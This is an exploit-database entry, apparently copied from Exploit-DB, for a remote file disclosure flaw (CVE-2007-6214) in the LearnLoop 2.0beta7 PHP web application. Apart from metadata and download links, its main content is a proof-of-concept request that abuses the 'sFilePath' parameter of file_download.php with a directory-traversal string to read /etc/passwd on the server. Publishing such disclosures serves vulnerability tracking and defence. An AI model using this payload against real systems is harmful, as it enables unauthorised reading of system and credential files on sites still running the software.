LearnLoop 2.0beta7 - 'sFilePath' Remote File Disclosure
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-11-28
date_updated: 2016-10-20
verified: 1
codes: OSVDB-39698;CVE-2007-6214
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comlearnloop2.0beta7.tar.gz
LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability
http://surfnet.dl.sourceforge.net/sourceforge/learnloop/learnloop2.0beta7.tar.gz
POC : /include/file_download.php?sFilePath=../../../../../../../etc/passwd
# milw0rm.com [2007-11-29]